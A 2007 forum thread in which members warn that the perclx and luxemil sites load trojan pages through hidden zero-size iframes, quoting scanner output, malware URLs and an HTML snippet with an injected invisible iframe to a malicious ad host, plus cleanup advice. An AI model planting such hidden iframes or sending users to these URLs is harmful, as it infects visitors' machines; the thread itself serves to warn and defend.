wagdoll
Feb 6 2007, 01:03 PM
I've been sent a readout from Jutaky's detektor as perclx gave off a virus alert. The virus (trojan VBS.psyme) is actually coming from the luxemil that perclx is running in a 0 iframe though.
The trojan is coming from this URL http:// lastlongerpills.net/haotian.htm(DO NOT CLICK ACTIVE MALWARE)
I don't know if this is a case of hacking or if the file has been placed on purpose... But I would avoid visiting any luxemil or perclx pages or any pages with luxemil or perclx in 0 iframes
CODE
http://jutaky.no-ip.org/index.php?option=c...9&Itemid=32
Total zeroiframes found: 4
(Level: 0) Url checked:
http://www.perclx.co.uk/index.php?page=reg...mp;refer=zoltan
Zeroiframes detected on this site: 1
No ad codes identified
(Level: 1) Url checked: (iframe source)
http://www.luxemil.com/search/portal.php?username=o
Zeroiframes detected on this site: 2
No ad codes identified
(Level: 2) Url checked: (iframe source)
http://lastlongerpills.net/haotian.htm
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 2) Url checked: (iframe source)
http://www.luxemil.com/search/anticheat.php?username=o_
Zeroiframes detected on this site: 1
No ad codes identified
(Level: 3) Url checked: (iframe source)
http://www.luxemil.com/search/index.php?us...=bridal+jewelry
Zeroiframes detected on this site: 0
No ad codes identified
BIAF
Feb 16 2007, 01:59 PM
Indeed :s - Iframes removed, twice! Password changed 2nd time, no more Iframes come back.
Jeff @ PerClx
wagdoll
Feb 18 2007, 10:32 PM
Thanks for dealing with that. Do you own luxemil as well then as you have that kind of access to remove 0 iframes?
The cheating 0 iframes are still on there even if the trojan code is gone...
These aren't from being hacked though, these were deliberately placed to do bot searches.
CODE
Zeroiframes detected: 3
Check took 2.07 seconds
(Level: 0) Url checked:
http://www.luxemil.com/search/portal.php?username=o
Zeroiframes detected on this site: 1
No ad codes identified
(Level: 1) Url checked: (iframe source)
http://www.luxemil.com/search/anticheat.php?username=o
Zeroiframes detected on this site: 1
No ad codes identified
(Level: 2) Url checked: (iframe source)
http://www.luxemil.com/search/index.php?username=o&keywords=atlantic+city+hotels
Zeroiframes detected on this site: 1
No ad codes identified
(Level: 3) Url checked: (iframe source)
http://www.luxemil.com/search/
Zeroiframes detected on this site: 0
wagdoll
Mar 9 2007, 12:00 PM
Luxemil has a trojan on it again. Once again not only luxemil will be affected but also all the sites that run luxemil portals in 0 iframes.
CODE
<html>
<head>
<title>Luxemil Search Engine</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.Estilo1 {
font-size: 36px;
font-weight: bold;
}
-->
</style>
</head>
<body>
<table align="center" border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse; border-width: 0" bordercolor="#111111" width="60%" id="AutoNumber1" height="87">
<tr>
<IFRAME src=http://www.revenuead.com/cpm.htm width=0 height=0></IFRAME>
. revenuead.com/cpm.htm
This contains trojan exploit code.
wagdoll
Mar 10 2007, 10:55 PM
Got a note back from luxemil to say that the revenue ad is not from their site.
trekkiesg
Mar 15 2007, 06:48 AM
http://perclx.co.uk/ptptext.php?refer=wolf401 is still loading the Luxemil searches.
contacted WM again.
wagdoll
Mar 15 2007, 08:34 AM
Where are the perclx banners of wolf401? Are they on one of his sites or PTP pages?
trekkiesg
Mar 15 2007, 10:56 AM
Actually, I came across the Perclx banners on other sites.
eg. train-emails.com, skunksptr.com
Train-emails -
imageSkunksptr -
imagenot sure if this is the info you need?
wagdoll
Mar 15 2007, 03:46 PM
Yes that is what I was interested in. Wolf401 owns train-emails and skunks and has been using the perclx with luxemil for a while. He used to use luckptp and before that neoffic and free20 and contacting has always been futile in the past.
Thank you for posting about it so that we know he's still running these banners.
trekkiesg
Mar 15 2007, 04:05 PM
Oh, I had no idea about his history.
No problem. Happy to pass on and learn from each other.
rich_ace_G
Apr 2 2007, 06:32 PM
how can i solve this? i think my pc got affected. now it keeps opening ie with this sites including revenuead. thanks.
wagdoll
Apr 2 2007, 11:43 PM
QUOTE(rich_ace_G @ Apr 3 2007, 01:32 AM) [snapback]4670248[/snapback]
how can i solve this? i think my pc got affected. now it keeps opening ie with this sites including revenuead. thanks.
It sounds like you have got a homepage hijacker - that will change the page that comes up when you start IE up.
I would try adaware, spybot and spywareblaster. You should be able to put these into google search engine to get links where you can download them for free. I believe spywareblaster has an option to lock your homepage to prevent hijackings.
BIAF
May 11 2007, 03:55 PM
Ok, PerClx PTP banners have been disabled on my site long ago, people seem to not listen to emails. Luxemil is not my site, I did indeed insert this code into my index page as it was allowd but little did I know that some search results through this iframe where triggering virus's - I did end up getting hacked my self in the end up, and then someone started adding I-Frames into the same area I had Luxemil inserted, what ever I got hit with, it seem to take every cent from my e-Gold account auto, i.e if i sent my E-gold 2cents, then when i login to check, its been take'n out by random users in gold weight. So the lesson for me is, don't use Iframes, you could be bitten bad. I have noone to blame but my self.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.